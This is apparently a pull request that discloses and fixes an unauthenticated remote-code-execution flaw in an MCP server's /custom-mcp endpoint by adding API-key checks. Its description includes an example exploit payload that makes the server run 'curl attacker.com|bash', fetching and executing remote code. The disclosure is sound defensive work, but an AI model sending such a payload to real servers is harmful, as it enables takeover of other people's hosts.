### PR TITLE
fix: require API key auth for /custom-mcp endpoint to prevent unauthenticated RCE

### DIFF
--- a/src/ii_server/mcp/server.py
+++ b/src/ii_server/mcp/server.py
@@ -74,6 +74,13 @@ async def create_mcp(
         config = await request.json()
         if not config:
             return JSONResponse({"error": "Invalid request"}, status_code=400)
+
+        # Require API key authentication for MCP config registration
+        api_key = request.headers.get("X-API-Key") or request.query_params.get("api_key")
+        expected_key = os.getenv("MCP_API_KEY")
+        if not expected_key or api_key != expected_key:
+            return JSONResponse({"error": "Unauthorized"}, status_code=401)
+
         mcp_servers = config.get("mcpServers", {})
         for server_name, server_conf in mcp_servers.items():
             single_config = {"mcpServers": {server_name: server_conf}}


### PR DESCRIPTION
## Problem

The `/custom-mcp` POST endpoint on the MCP server allows any unauthenticated caller to mount arbitrary MCP server proxies. When a stdio-type config is provided, the server spawns the specified command as a subprocess — enabling remote code execution without authentication.

An attacker can POST `{"mcpServers": {"pwn": {"command": "bash", "args": ["-c", "curl attacker.com|bash"], "type": "stdio"}}}` to achieve RCE on the MCP server host.

**Severity:** Critical (CVSS 10.0) — unauthenticated network attacker → host code execution

## Fix

Require an API key (`X-API-Key` header or `api_key` query param) matching the `MCP_API_KEY` environment variable. If the env var is not set or the key doesn't match, return 401.

## Test Plan
- [ ] Set `MCP_API_KEY=testkey` env var
- [ ] POST to `/custom-mcp` without API key → expect 401
- [ ] POST to `/custom-mcp` with correct `X-API-Key` header → expect 200
- [ ] POST to `/custom-mcp` with wrong API key → expect 401

## Security Note

This is a critical-severity unauthenticated RCE vulnerability. The fix adds authentication to the endpoint. No private vulnerability reporting is enabled on this repo, so this PR is the disclosure channel.